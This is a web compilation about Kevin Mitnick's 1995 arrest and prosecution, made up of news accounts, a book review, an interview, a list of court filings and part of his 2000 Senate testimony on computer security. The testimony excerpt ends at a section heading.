On a recent Sunday morning, Shimomura took a flight from San Jose to Raleigh-Durham International Airport. By 3am the next day, he had helped local telephone company technicians and federal investigators use cellular-frequency scanners to pinpoint Mitnick's location: a 12- unit apartment building in the Raleigh suburb of Duraleigh Hills.

Over the next 48 hours, as the FBI sent in a surveillance team, obtained warrants and prepared for an arrest, cellular telephone technicians from Sprint Corporation monitored the electronic activities of the man they believed to be Mitnick.

Last Christmas day, Tsutomu Shimomura was in San Francisco, preparing for a holiday in the Sierra Nevadas.

Before he could leave, he received a telephone call from colleagues at the San Diego Supercomputer Centre someone had broken into his home computer, which was connected to the centre's computer network.

Shimomura returned to his beach cottage at Solana Beach, California, where he found that hundreds of software programs and files had been taken electronically from his powerful work station.

This was no random ransacking: the information would be useful to anyone interested in breaching the security of computer networks or cellular phone systems.

The Christmas attack exploited a flaw in the Internet's design by fooling a target computer into believing that a message was coming from a trusted source.

By masquerading as a familiar computer, an attacker can gain access to protected computer resources and seize control of an otherwise well-defended system. In this case, the attack began from a commandeered computer at Loyola University, Chicago.

Although the vandal was deft enough to gain control of Shimomura's computers, he, she or they made an error. One of Shimomura's machines routinely mailed a copy of several record-keeping files to a safe computer elsewhere on the network a fact that the intruder did not notice.

That led to an automatic warning to employees of the supercomputer centre that an attack was under way. This allowed staff to throw the burglar off the system and it later allowed Shimomura to reconstruct the attack.

In computer-security circles, Shimomura is a respected voice. Over the years, software security tools that he designed have made him a consultant not only to corporations, but also to the FBI, the Air Force and the National Security Agency.

The first significant break in the case came on 28 January, after Bruce Koball, a computer programmer in Berkeley, California, read a newspaper account detailing the attack on Shimomura's computer.

The day before, Koball had received a puzzling message from the managers of a commercial online service called the Well. Koball is an organiser for a public-policy group called Computers, Freedom and Privacy, and the Well officials told him that the group's directory of network files was taking up millions of bytes of storage space, far more than the group was authorised to use.

That struck him as odd, because the group had made only minimal use of the Well. But as he checked the group's directory on the Well, he realised that someone had broken in and filled it with Shimomuru's stolen files.

Well officials eventually called in Shimomura, who recruited a colleague from the supercomputer centre and an independent computer consultant.

Hidden in a back room at the Well's headquarters, the three experts set up a temporary headquarters, attaching three laptop computers to the Well's internal computer network.

The team had an immediate advantage: it could watch the intruder unnoticed.

Although the identity of the attacker was unknown, within days a profile emerged that seemed increasingly to fit a well-known computer outlaw: Kevin Mitnick, who had been convicted in 1989 of stealing software from Digital Equipment Corporation.

Among the programs found at the Well and at hiding places elsewhere on the Internet was the software that controls the operations of cellular telephones made by Motorola, NEC, Nokia, Novatel, Oki, Qualcomm and others. That would be consistent with the kind of information of interest to Mitnick, who had first made his reputation by hacking into telephone networks.

The burglar operated with Mitnick's trademark derring-do. One night, as the investigators watched electronically, the intruder broke into the computer designed to protect Motorola's internal network from outside attack.

But one brazen act helped the investigators. Shimomura's team discovered that someone had obtained a copy of the credit-card numbers for 20,000 members of Netcom Communications, a service based in San Jose that provides Internet access.

To get a closer look, the team moved its operation to Netcom's network operation centre in San Jose.

To let its customers connect their computer modems to its network with only a local telephone call, Netcom provides dozens of computer dial-in lines in cities across the country.

Hacking into the long-distance network, the intruder was connecting a computer to various dial-in sites to elude detection. Still, every time the intruder connected to the Netcom system, Shimomura was able to capture the computer keystrokes.

FBI surveillance agents in Los Angeles were almost certain that the intruder was operating somewhere in Colorado. Yet calls were also coming into the system from Minneapolis and Raleigh.

The big break came in San Jose, as Shimomura and Gross, red-eyed from a 36-hour monitoring session, were eating pizza. Subpoenas issued by Kent Walker, the US assistant attorney-general in San Francisco, had begun to yield results from telephone company calling records.

Data came from Walker showing that telephone calls had been placed to Netcom's dial-in phone bank in Raleigh through a cellular telephone modem.

The calls were moving through a local switching office operated by GTE Corp. But GTE's records showed that the calls had looped through a nearby cellular phone switch operated by Sprint Corporation.

Because of someone's clever manipulation of the network software, the GTE switch thought that the call had come from the Sprint switch, and the Sprint switch thought that the call had come from GTE.

Neither company had a record identifying the cellular phone.

When Shimomura called the number in Raleigh, he could hear it looping around with a "clunk, clunk" sound. He called a Sprint technician in Raleigh and spent five hours comparing Sprint's calling records with the Netcom log-ins. It was almost dawn in San Jose when they determined that the cellular phone calls were being placed from near the Raleigh-Durham International Airport.

By 1am on Monday, Shimomura was riding around Raleigh with a Sprint technician, who drove his own car so as not to attract attention.

Shimomura held a cellular-frequency direction-finding antenna and watched a signal-strength meter on a laptop computer screen. Within 30 minutes the two had narrowed the site to an apartment complex in Duraleigh Hill, four kilometres from the airport.

The next evening, the agents had an address and a federal judge issued a warrant. When FBI agents knocked on the door of Apartment 202, it took Mitnick more than five minutes to open it.

When he did, he said he was on the phone with his lawyer. But when an agent took the receiver, the line went dead.


Return to the Beginning of this document

The Fugitive Game - online with Kevin Mitnick by Jonathan Littman

Little, Brown and Company ISBN 0-316-52858-7
Reviewed by Chris Gulker


The Fugitive Game by Jonathan Littman is the first of at least 3 books written on the subject of the events surrounding Kevin Mitnick's arrest in February of 1995. Mitnick's arrest and the efforts of computer security specialist Tsutomu Shimomura to apprehend him were the subject of a highly publicized series of articles by John Markoff in the New York Times in late 1994 and early 1995.

The Fugitive Game is sympathetic to Mitnick's point of view, and suggests that Markoff and Shimimura took advantage of the hype over the Internet to unfairly paint Mitnick as a monster in order to cash in on lucrative book and movie deals.

Mitnick, it should be noted by way of preamble, has been widely villified in the popular media as the personification of the criminal hacker, variously blamed with hacking NORAD, major computer and communication companies, Internet providers, credit card holders et al.

Author Jonathan Littman, a freelance investigative journalist, became a trusted sounding board for Mitnick about a year after after he slipped underground for parole violations late in 1992. The relationship sprung up while Littman worked on a book, as yet unpublished, about the shadowy world of hackers over the edge of legality.

Littman's book contains transcripts of hours of conversations with Mitnick while he lived the gritty, nervous life of a fugitive, juxtaposed with views drawn from prosecutors, federal agents, the media and other hackers. The narrative, while sometimes running to length, nevertheless manages to build to a climax, peaking not at Mitnick's arrest, but the denouement of events afterward..

In Littman's portrait, Mitnick emerges as a sad, lonely kid, whose hardscrabble upbringing is softened only by his ability to learn and master arcane subjects on his own. Starting with Los Angeles County buses, young Mitnick finds comfort in learning how to ride long distances for free. Overweight, angry and alone, teenaged Mitnick progresses to hacking ham radio, the telephone system and the Internet.

By age 17, Mitnick has been convicted of illegally accessing corporate computers. Before turning 30, Mitnick is a convicted felon and federal fugitive, running from seamy apartment to cheap motel, frequently escaping pursuers by seconds or minutes. While Mitnick does break the law, he doesn't do it for riches, and Littman goes to some lengths to contrast Mitnick with criminals like Justin Peterson (aka Agent Steal) who used their hacker abilities to rip off credit cards, banks, radio stations and more.

Markoff receives a much less sympathetic hearing. Littman proceeds from professing respect to broadly suggesting that Markoff knows that Mitnick is harmless (if annoying), but proceeds nevertheless to paint him as a master criminal, the better to cash in on book and movie deals.

It is true that Markoff's role in the Mitnick affair caused a buzz in press circles early last year (I was still at The Examiner, then - much tittering could be heard in the news room). Markoff was a victim of Mitnick's hacking, and a friend of Shimimura's, facts that the New York Times chose not to reveal as Markoff wrote a series of articles about Mitnick.

A blurry picture of Markoff's role in Mitnick's apprehension has emerged, allowing room for critics like Littman to suggest that Markoff was not a disinterested or, at least, disengaged, observer.

For his part, Markoff has maintained that he behaved ethically as a fast-moving story unrolled, and has characterized Littman's book as a "vendetta". Other critics have raised questions about some of Littman's conclusions and methods. I found that his premise warranted consideration, but never felt the case proved beyond a reasonable doubt.

Nevertheless, I found The Fugitive Game interesting, sometimes fascinating reading, particularly when it is describing the oddly skewed lives of obsessive hackers. Mitnick is certainly guilty of something: whether Markoff is guilty as charged is much less clear and must be left to the reader, who will hopefully also read Takedown (as I am doing), the book written from the other side by Shimomura and Markoff.


Return to the Beginning of this Document

Mitnick, Tuna, Reviewing Evidence -- 1997 and 1998

Mitnick Put in Solitary Confinement for "Hoarding Tuna" -- 2/1/97

Kevin Mitnick was arrested in February 1995 after a nationwide search by federal investigators that later became the subject of several books. He faces three separate federal indictments: possession of cellular phone account information, violating the conditions of a supervised release program relating to a 1989 conviction of computer fraud, and alleged computer fraud committed between November 1992 and his arrest.

Alleged software thief Kevin Mitnick was put in solitary confinement at the Los Angeles Metropolitan Detention Center on February 1, 1997 for apparently for hoarding 74 cans of tuna in his cell, his lawyer said. When asked why Mitnick would have so many cans of tuna in his cell, Mitnick's lawyer answered, "Fish is brain food, you know."

Mitnick Not Allowed to Use Computer to Review Evidence -- 3/31/1998

On March 31, 1998, US District Court Judge Mariana Pfaelzer ruled that Kevin Mitnick could not use a computer to review government evidence in his upcoming trial on computer-fraud and theft charges, a federal judge has ruled.

Judge Pfaelzer said "We're never in the world going to do that."

Government prosecutors argued that because of the nature of the charges against him, allowing Mitnick unrestricted access to files containing such things as computer burglar tools would be unwise. They also called him a flight risk and argued against bail. The judge agreed.

Pfaelzer ordered prosecutors to come up with an alternative plan that would allow Mitnick to review the evidence files. She gave them until 13 April to submit a proposal.

The data, seized by the FBI from Mitnick's computer when he was arrested in 1995, could contain evidence that could prove him innocent of some of the charges against him, according to his defense.

In its encrypted form, the data is useless to prosecutors, who may have tried to decode it and failed, said Donald C. Randolph, the Santa Monica, California, attorney defending Mitnick.

When Randolph was pushed to explain what the new data might include, he would only offer a hypothetical example.

"Such a file might be a letter from a recreational hacker to my client saying they had hacked into company XYZ, and asking if he would like to see the information on how to do it," Randolph said. "Something like that might show that one of the alleged victim companies was hacked by someone other than my client."

"We told the judge that giving him access to those files was like giving someone access to a locked safe that might contain a gun," Painter said. "[Mitnick's attorneys] claimed in court that the data might contain exculpatory evidence but offered no further explanation."

Vincent also said the government was willing to give access to the encrypted files, provided that Mitnick hand over the password. This, said Vincent, would violate Mitnick's Fifth Amendment rights against self-incrimination.

"These are obviously files the government does not plan to use, but because we don't know what's in them, we don't think they should be turned over," Painter said.

Hacker Protest at Takedown Film Content -- July 16, 1998

Protests from the hacker community were held Thursday, July 16, 1998 outside Miramax's offices in New York and Los Angeles over the impending production of the movie Takedown.

Based on the 1996 book by security specialist Tsutomu Shimomura and New York Times reporter John Markoff, the book recounted the pursuit and 1995 arrest of computer hacker Kevin Mitnick, who has been jailed in Los Angeles for three years without bail while awaiting trial on charges of computer and telephone fraud.

"Emmanuel Goldstein," editor of 2600: the Hacker Quarterly, wrote a review after obtaining a 20 March version of the screenplay: "If this film is made the way the script reads, Kevin will be forever demonized in the eyes of the public, and mostly for things that everyone agrees never even happened in the first place."

Among many the scenes Goldstein (in real life generally known as Eric Corley) singled out for criticism: Mitnick changing medical records, Mitnick clobbering Shimomura on the head with the top of a metal garbage can, and Mitnick whistling touch tones into a pay phone to avoid having to pay. Mitnick has never been accused of tampering with medical records or of physical violence, and supporters do not believe that Mitnick was motivated by profits.

According to Goldstein, Mitnick is wrongly depicted as a violent racist who malevolently alters medical records. Goldstein is concerned that the image will perpetuate stereotypes of hackers. "They make him a little too maniacal," said the art director of 2600, who identified himself only as "Phil."

"The only thing that's missing is, like, giving him a mechanical arm," said Phil. He paused, staring with amusement at passing businessmen who were getting their picture taken under a "Free Kevin" banner.

"This is more of a Larry Flynt story," said Phil. "Kevin is a modern-day political prisoner who has been put away for something people don't understand." Phil said that he has been in daily contact with Mitnick.

"There's a strong consensus in the [hacker] community," says Goldstein, "that putting out these fabrications on the big screen is, quite simply, wrong, and must be stopped. We're not trying to stop anyone's creative fictionalized story. But this is being labeled as the way it really happened with real people. Since the one person demonized the most is being kept from defending himself, it's up to the rest of us to do what's right."

Miramax declined comment, leaving open the question of how much the screenplay has changed since the version Corley saw and in what direction. No date has been announced for the film's release.

Markoff says he has not seen the screenplay and is not involved with the film. "I've only read what's been posted to the Web, and Eric Corley is the only one I've seen commenting on it," he says. "There are lots of things in it that never happened, but I expected that. This is Hollywood, after all."

The time Mitnick has spent in jail awaiting trial -- while due partly to his having waived his right to a speedy trial and to delays requested by the defense to gain time to examine the evidence -- is a sore point in the hacker community. Hackers regard him and others in situations similar to his as political prisoners.

Mitnick Wins Narrow Victory to Review Evidence with Laptop -- 7/1998

Despite the non-violent nature of his crimes and the charges in the upcoming case, Mitnick has been held at the Metropolitan Detention Center in Los Angeles, where inmates are often held for violent crimes. His appeals for bail have been turned down by every court they've been sent to, including twice by the U.S. Supreme Court.

Mitnick's trial had been delayed several times due its complexity, and often at the request of the defense. Randolph said Mitnick's limited access to a computer has hampered his efforts to assist in his defense.

Randolph tried repeatedly to get Mitnick a computer so he could review evidence that reportedly includes witness statements totaling 1,400 pages, 10 gigabytes of electronic evidence and 1,700 exhibits in all.

In July, 1998, Mitnick won a narrow victory when the US District Court allowed Mitnick limited use of a laptop computer to review evidence against him. The laptop is disabled from connecting with the outside world. It has no modem, and no network card.

The data is recorded on write-disabled CD-ROM disks. Mitnick is only allowed to use the computer in the presence of either Randolph or Vincent at the Metropolitan Detention Center is Los Angeles.

"It would be a lot more efficient if he could review it on his own time, but the judge has decided that he must do it under our supervision," Vincent said.

In another development, US Supreme Court Justice Sandra Day O'Connor declined on 31 August to hear an emergency appeal to obtain bail for Mitnick. That decision guarantees that Mitnick will remain in prison pending his trial, which is due to begin on 19 January 19 1999.

If convicted, Mitnick could face up to seven years in prison, Painter said.


Return to the Beginning of this Document

Kevin Mitnick's Guilty Plea

From Don Randolph, Kevin Mitnick's Attourney -- 3/26/99

On Friday, March 26, 1999, Kevin Mitnick ended his forty-nine month battle with the Government by pleading guilty to some charges arising from his activities as a computer hacker.

According to Donald C. Randolph, Mr. Mitnick's attorney, the plea aggreement was substantially more favorable than the offer from the Governement in 1995. The earlier offer allowed the Government to argue for up to eight years in custody, and gave the Court full discretion to impose an even greater sentance. The current agreement, which allows no discretion to the Court, calls for a sentance of forty-six months for the pending charges (after substracting eight months from the already-served sentence from North Carolina).

With credits for good time, Mr. Mitnick could be eligible for release to a half-way house by early Fall, 1999. However, his timely release from custody could be delayed by a pending State prosecution in Van Nuys, California for allegations of computer fraud.

Mitnick's attorney, Donald C. Randolph, declined to comment on the details of the plea agreement, except to say that his client is relieved to have achieved a level of certainty in resolving his on-going situation with the federal government. Mr Randolph stated "my client can now see light at the end of the tunnel, and has a reasonable certainty that it is not another train approaching."


Return to the Beginning of this Document

Mitnick's Own Words About His 'Hacking' -- Forbes.com Interview 5/99

Kevin Mitnick is the most famous hacker in history. He has been in prison for more than four years for crimes that, when you get down to it, amount to little more than illegally copying proprietary software belonging to major companies including Motorola, Nokia and Sun.

He was made a household name by New York Times reporter John Markoff, who featured Mitnick in a book called Cyberpunk (published in 1991), then wrote a front page story for the Times on July 4, 1994, that portrayed Mitnick as a superhacker who could wreak cyberhavoc--and ruin lives--if not caught by the Feds.

Then a funny thing happened. Markoff's friend, Tsutomu Shimomura, claimed that Mitnick had hacked his home computer on Christmas Day, 1994, and went after him, with Markoff in tow. When Shimomura tracked Mitnick down in North Carolina, Markoff was there for the kill. This was documented in subsequent front-page stories and a book called Takedown, for which Markoff and Shimomura shared a $750,000 advance. Expect the movie version soon.

Markoff became a journalism star as a result of his crusade. Shimomura's name, in the ultimate geek tribute, is recognized by Microsoft Word98 spell check. Not even Sherlock Holmes can say that.

Yet, according to Dale Coddington and Brian Martin, both of whom were hired by the defense to comb through the 9 gigabytes of electronic evidence amassed against Mitnick, there is no proof that Mitnick hacked Shimomura. For all the fanfare it received, it was never contained in the indictment. Yet, the media coverage has had a profound impact on Mitnick's case.

Mitnick reads everything written about him and says he often can’t believe what he reads. He has seen himself portrayed as a "dark side" hacker intent on toppling civilization; a criminal who as a teenager penetrated computers at NORAD, inspiring the hit flick War Games; a phone phreaker who, just by whistling three tones into a telephone receiver, could launch World War III; and a computer hacker who, merely armed with a computer sans modem, could wreak cyberhavoc from his jail cell.

But the reality is a lot less sexy. Kevin Mitnick is a recreational hacker with a compulsive-obsessive relationship to information. He hoarded information, never sold it, and wouldn’t even share it with his friends.

Although he is portrayed in the upcoming film Takedown as an evil menace to society, Mitnick is really just your average geek who has done some bad things in his life, and has paid the price. To this day, he would like nothing more than to dissect some computer program to see how it works.

Says Martin, who often visited Mitnick in prison, "Kevin still wants to look through cellular source code to see how it works. You can see it in his eyes that he'd love to kick back with a printout and just figure it out on his own."

Mitnick doesn’t trust the media. But he agreed to let Forbes interview him over a span of several evenings recently by telephone.

Here is Kevin Mitnick in his own words:

Forbes.com [F]: How would you characterize the media coverage of you?

Mitnick [M]: When I read about myself in the media even I don't recognize me. The myth of Kevin Mitnick is much more interesting than the reality of Kevin Mitnick. If they told the reality, no one would care.

[F} Have stories that John Markoff wrote about you in The New York Times had any impact on your legal proceedings?

[M} Markoff has single-handedly created "The Myth of Kevin Mitnick," which everyone is using to advance their own agendas. I wasn't a hacker for the publicity. I never hacked for personal gain. If I was some unknown hacker, accused of copying programs from cell phone companies, I wouldn't be here. Markoff's printing false and defamatory material about me on the front page of The New York Times had a substantial effect on my case and reputation. He's the main reason I'm still in custody.

[F] The Times continues to report (most recently on March 18) that you had hacked NORAD. Is this true?

[M] No way, no how did I break into NORAD. That's a complete myth. And I never attempted to access anything considered to be classified government systems.

[F] What do you think about hacks done in your name--for instance, last September's hack of The New York Times web site. Do they further your cause?

[M] I don't condone anyone causing damage in my name, or doing anything malicious in support of my plight. There are more productive ways to help me. As a hacker myself, I never intentionally damaged anything.

[F] How have you spent most of your time in prison?

[M] Most people here are content watching TV, playing pinochle, dominoes and poker. I work on my defense 14 hours a day.

[F] What do you think of the restrictions placed on you when you get out of prison as part of your plea agreement?

[M] The requirements mandating I can't touch a computer or cell or cordless phone are akin to telling a forger not to use a pen or paper. There is no way I can earn a living when I get out. I couldn't even work at McDonald's. All I could do is something like gardening.

[F] What do you plan on doing when you get out of prison?

[M] "I don't know, but once I get out of here and get on with the rest of my life, I'll never intentionally violate the law."


Return to the Beginning of this Document

Court Documents on the 1995 Kevin Mitnick Case

June 5, 2000
Brief Amici Curiae in support of defendent's motion for clarification of the terms of his supervised release
June 2, 2000
Notice of application, application for clarification of supervised release terms and conditions, declaration of counsel and exhibits, and memorandum of law
August 20, 1999
Emergency Motion
August 16, 1999
Ex Parte Application for Order that Defendant be Housed at MDC Pending Designation
July 26, 1999
Ex Parte Application To Unseal Defense Request for Sanctions and Pleadings Relating to Restitution; Declaration of Gregory L. Vinson
June 28, 1999
Ex Parte Application for Temporary Release
June 7, 1999
Defense Consolidated Motion for Sanctions and for Reconsideration of Motion for Discovery and Application for Expert Fees Based upon New Facts
May 6, 1999
Government's Request for an Order to Show Cause Why Defense Counsel Should not be Sanctioned for Releasing Confidential Victim Loss Letters: Government intends to hold Kevin's attorney Donald Randolph in contempt for revealing documents which were previously filed as publicly available court documents, with no protest from the prosecution. Perhaps the corporations the government has named as victims in the case are unhappy at this publicity, and the possibility of SCC and IRS investigations into why the information in these letters was never revealed to their stockholders. It now seems even more likely that the financial loss figures in the case against Mitnick were fabricated with one purpose: to keep him imprisoned without bail and without trial for a lengthy period. While they may have succeeded in this, the revelations of the deception will finally force the prosecutors to answer some very difficult questions. (click here to view the loss letters)
May 10, 1999
Motion to Bifurcate Hearing on Restitution: Defense requests that the Court "bifurcate the hearing on Restitution into, first, a hearing on the Defendant's Ability to Pay, and second, if necessary, a hearing on the Amount of Restitution."
April 19, 1999
Notice of Motion and Motion for Discovery: Defense requests that the government not delay disclosure of discovery related to restitution issues to be addressed in court.
April 5, 1999
Notice of Motion and Motion to Suppress Evidence: "...Tsutomu Shimomura and his associate, Andrew Gross, acting as government agents, illegally intercepted wire communications without a court order..."
April 5, 1999
Notice of Motion and Motion to Suppress Evidence seized in Washington state
April 5, 1999
Notice of Motion and Motion to Suppress Evidence seized in North Carolina
March 9, 1999
Reply to Government's Opposition RE: Motion for Discovery
February 22, 1999
Motion for Court Order RE: Discovery; Request for Sanctions
January 22, 1999
Defense Reply in Support of Ex Parte Application to Continue Trial Date
January 21, 1999
Government's Opposition To Defendant Mitnick's Ex Parte Application To Continue Trial And Order Discovery
January 19, 1999
Ex Parte Application RE: Continuance of Trial Date and Request For Order RE: Discovery
December 3, 1998
Court transcript  Discussion of trial continuance date..... A statement from the defense's motion (challenging prosecution's apparent attempt to convince the judge that files erased from a disk are equivalent to words erased from a piece of paper) is misinterpreted as a comment on "the court's presumed lack of expertise in sophisticated computer technology"..... Judge indicates she will separate the trials of Kevin Mitnick and co-defendant Lewis DePayne.
December 2, 1998
Court transcript  Brief dispute over whether trial should be continued..... Judge again indicates her eagerness to try the case..... Judge is upset and puts the government on notice to watch for anything "untoward" to happen because a 2600 staffer legally requested her financial disclosure reports (which are on record for all judges, to lessen the possibility of their involvement in cases in which they have financial interests). The basis of this paranoia? It was assumed the person was "a friend of Mr. Mitnick's" because that person had an address in North Carolina, the same state where Kevin was arrested in 1995.
December 2, 1998
Defendant Mitnick's Response to Government's Consolidated Opposition To Defendant's Motions; Declaration of Donald C. Randolph
December 2, 1998
Declaration of Donald C. Randolph in support of motion for discovery and motion to continue
December 2, 1998
Government's Consolidated Opposition To Defendant Mitnick's Motion: (A) For Discovery And (B) To Continue The Trial In This Matter; Memorandum Of Points And Authorities
Government's response to Nov. 24 motions, denying that they violated terms by which evidence was to be given to the defense; and denying that there was any government intrusion on the client-attorney privilege between Mitnick and his former attorney.
November 24, 1998
Motion to Continue Trial Date
Motion filed Nov 24, 1998 to the Court for an order continuing the trial date, currently scheduled for January 19, 1999, until April 13, 1999.
November 24, 1998
Motion for Discovery
Motion filed Nov 24, 1998 to the Court for an order requiring the government to produce discovery pursuant to the Court's June 3, 1998 Omnibus Order Re: Discovery and Pretrial Management.
October 19, 1998
US Supreme Court Denies Emergency Application for Bail Again
October 1, 1998
Emergency Application for Bail for Bail Re-Submitted to the US Supreme Court
August 24, 1998
US Supreme Court Denial of Emergency Application for Bail
August 18, 1998
Petition For Writ Of Certiorari From The US Court Of Appeals For The Ninth Circuit. For review of Mitnick's supervised release conditions.
Click here to view the section outlining Kevin's release conditions
July 18, 1998
Emergency Application for Bail From The US Court Of Appeals For The Ninth Circuit
July 1, 1998
Denial of Petition for Re-hearing of Bail Motion.
June 17, 1998
Supplemental Memorandum Re: Petition For Reconsideration; [Proposed] Order
June 15, 1998
Petition For Reconsideration Or, Alternatively, For Permission To Appeal
regarding the Court's denial of Kevin's right to review computer evidence
May 30, 1998
Court Link File 1, Catalog of Events
May 30, 1998
Court Link File 2, Catalog of Events
May 20, 1998
Ninth Circuit Court of Appeals order affirming District Court's conditions of supervised release
Request for oral argument on the appeal was flatly denied; and "Mitnick's challenge to the supervised release conditions on vagueness grounds because 'computer' and other terms are not defined also fails because the conditions give Mitnick fair notice of what is prohibited."
May 20, 1998
Court transcript
May 19, 1998
Ninth Circuit Court of Appeals order upholding District Court's summary denial of bail
May 14, 1998
Defendant Mitnick's Opposition To Government's Proposed Omnibus Order Re: Discovery And Pretrial Management
May 8, 1998
Defendant DePayne's Response To Government's Proposed Omnibus Order Re: Discovery And Trial Management
May 7, 1998
Memorandum of Law and Facts in Support of Bail Appeal from the US District Court for the Central District of California
April 27, 1998
Opposition To Government's Proposed Findings Of Fact And Conclusion Of Law RE: Defendant's Application For Release Pending Trial
March 30, 1998
Court transcript: The Court refuses to even consider bail motion, refuses Defendant access to computer evidence for review (due to security concerns), and the amount of paperwork in the case becomes problematic.
March 25, 1998
Kevin Mitnick's Application For Release On Bail Pending Trial
March 19, 1998
Defendant's Reply To Government's Opposition To Supplemental Law Library Time
March 3, 1998
Reply To Government's Opposition To Defendant's Motion For Access To A Computer For Review Of Discovery
February 26, 1998
Motion RE: Supplemental Law Library Time
February 26, 1998
Appellant's Reply Brief
December 12, 1997
Appellant's Opening Brief (Federal appeal)
October 8, 1997
Court transcript (concerning Defense review of computer evidence; and the Court believes the Defense is asking for too much money for Kevin's legal defense)
June 27, 1997
Court transcript: Response by defense and prosecution to conditions of supervised release
June 23, 1997
Court transcript: Conditions of sentence and supervised release
June 16, 1997
Court transcript: 1st Sentencing hearing on violation of supervised release
June 9, 1997
Court transcript: Fugitive status hearing
October 7, 1996
Court transcript
September 26, 1996
Indictment
Basically, Kevin is charged with accessing several corporate computer systems without permission, and copying proprietary copyrighted software. He is not charged with selling this software, or using it; simply with copying it. The indictment contains the government's charges against Kevin.
April 22, 1996
Court transcript: Agreement to a plea bargain on North Carolina charges, in order to have Kevin's case transferred to his home state of California.

Return to the Beginning of this Document

Kevin Mitnick's Written Senate Testimony -- 3/2/2000

Honorable Chairperson Thompson, Distinguished Senators, and Members of the Committee:

My Biography

My name is Kevin Mitnick. I appear before you today to discuss your efforts to create legislation that will ensure the future security and reliability of information systems owned and operated by, or on behalf of, the federal government.

I am primarily self-taught. My hobby as an adolescent consisted of studying methods, tactics, and strategies used to circumvent computer security, and to learn more about how computer systems and telecommunication systems work.

In 1985 I graduated cum laude in Computer Systems and Programming from a technical college in Los Angeles, California, and went on to successfully complete a post-graduate project in designing enhanced security applications that ran on top of a computer's operating system. That post-graduate project may have been one of the earliest examples of "hire the hacker:" the school's administrators realized I was hacking into their computers in ways that they couldn't prevent, and so they asked me to design security enhancements that would stop others' unauthorized access.

I have 20 years experience circumventing information security measures, and can report that I have successfully compromised all systems that I targeted for unauthorized access save one. I have two years experience as a private investigator, and my responsibilities included locating people and their assets using social engineering techniques.

My experience and success at accessing and obtaining information from computer systems first drew national attention when I obtained user manuals for the COSMOS computer systems (Computer Systems for Mainframe Operations) used by Pacific Bell.

Ten years later the novel "Cyberpunk" was published in 1991, which purported to be a "true" accounting of my actions that resulted in my arrest on federal charges in 1988. One of the authors of that novel went on to write similarly fictionalized "reports" about me for the New York Times, including a cover story that appeared July 4, 1994. That largely fictitious story labeled me, without reason, justification, or proof, as the "world's most wanted cybercriminal."

Subsequent media reports distorted that claim into the false claim that I was the first hacker on the FBI's "Ten Most Wanted" list. That false exaggeration was most recently repeated during my appearance on CNN's Burden of Proof program on February 10, 2000. Michael White of the Associated Press researched this issue with the FBI, and FBI representatives denied ever including me on their "Ten Most Wanted" list.

I have gained unauthorized access to computer systems at some of the largest corporations on the planet, and have successfully penetrated some of the most resilient computer systems ever developed. I have used both technical and non-technical means to obtain the source code to various operating systems and telecommunications devices to study their vulnerabilities and their inner workings.

After my arrest in 1995, I spent years as a pretrial detainee without benefit of bail, a bail hearing, and without the ability to see the evidence against me, combined circumstances which are unprecedented in U.S. history according to the research of my defense team. In March of 1999 I pled guilty to wire fraud and computer fraud. I was sentenced to 68 months in federal prison with 3 years supervised release.

The supervised release restrictions imposed on me are the most restrictive conditions ever imposed on an individual in U.S. federal court, again according to the research of my defense team.

The conditions of supervised release include, but are not limited to, a complete prohibition on the possession or use, for any purpose, of the following: cell phones, computers, any computer software programs, computer peripherals or support equipment, personal information assistants, modems, anything capable of accessing computer networks, and any other electronic equipment presently available or new technology that becomes available that can be converted to, or has as its function, the ability to act as a computer system or to access a computer system, computer network, or telecommunications network.

In addition to these extraordinary conditions, I am prohibited from acting as a consultant or advisor to individuals or groups engaged in any computer-related activity. I am also prohibited from accessing computers, computer networks, or other forms of wireless communications myself or through third parties.

I was released from federal prison on January 21, 2000, just 6 weeks ago. I served 59 months and 7 days, after earning 180 days of time off for good behavior. I am permitted to own a land line telephone.

Computer Systems and Their Vulnerabilities


--------------------------------------------------------------------------------

The goal of information security is to protect the integrity, confidentiality, availability and access control to the information. Secure information is protected against tampering, disclosure, and sabotage. The practice of information security reduces the risk associated with loss of trust in the integrity of the information.

Information security is comprised of four primary topics: physical security, network security, computer systems security, and personnel security. Each of these four topics deserves a complete book, if not several books, to fully document them. My presentation today is intended to provide a brief overview of these topics, and to present my recommendations for the manner in which the Committee may create effective legislation.

1. Physical Security


1.1 Uncontrolled physical access

Uncontrolled physical access to computer systems and computer networks dramatically increases the likelihood that the system can and will suffer unauthorized access.

1.1.1 Hardware Security

Computers may be locked in rooms or buildings, with guards, security cameras, and cypher-controlled doors. The greatest risk to information security in apparently secure hardware environments is represented by employees, or impostors, who appear to possess authorization to the secured space.

1.1.2 Data Security

Many government agencies require formal backup procedures to ensure against data loss. Equally stringent requirements must be in place to ensure the integrity and security of those backup files. Intruders who cannot gain access to secure data but who obtain unauthorized access to data backups successfully compromise any security measures that may be in place, and with much less risk of detection.


2. Network Security


2.1 Stand-alone computers

Stand-alone computers are less vulnerable than computers that are connected to any network of any kind. Computers connected to networks typically offer a higher incidence of misconfiguration, or inappropriately enabled services, than computers that are not connected to any network. The hierarchy of network "insecurity" is as follows: Stand-alone computer - least vulnerable
Computer connected to a LAN, or local area network - more vulnerable
Computer and a LAN accessible via dial-up - even more vulnerable
Computer and LAN connected to internet -- most vulnerable of all

2.1.1 Unencrypted Network Communications

Unencrypted network communications permit anyone with physical access to the network to use software to monitor all information traveling over the network, even though it?s intended for someone else. Once a network tap is installed, intruders can monitor all network traffic, and install software that enables them to capture, or "sniff," passwords from network transmissions.

2.1.2 Dial-in Access

Dial-in access increases vulnerabilities by opening up an access point to anyone who can access ordinary telephone lines. Off site access increases the risk of intruders gaining access to the network by increasing the accessibility of the network and the remote computer.

3. Computer Systems Security


3.1 Non Connected Computer Systems

Computer systems that are not connected to any network present the most secure computing environment possible. However, even a brief review of standalone computer systems reveals many ways they may be compromised.

3.1.1 Operating Systems

The operating systems control the functions of the computer: how information is stored, how memory is managed, and how information is displayed -- it?s the master program of the machine. At its core, the operating system is a group of discrete software programs that have been assembled into a larger program containing millions of lines of code. Large modern day operating systems cannot be thoroughly tested for security anomalies, or "holes," which represent opportunities for unauthorized access.

3.1.2 Rogue Software Programs

?Rogue? software applications can be installed surreptitiously, or with the unwitting help of another. These programs can install a ?back door?, which usually consists of programming instructions that disable obscure security settings in an operating system and that enable future access without detection; some back door programs even log the passwords used to gain access to the compromised system or systems for future use by the intruder.

3.1.3 Ineffective Passwords

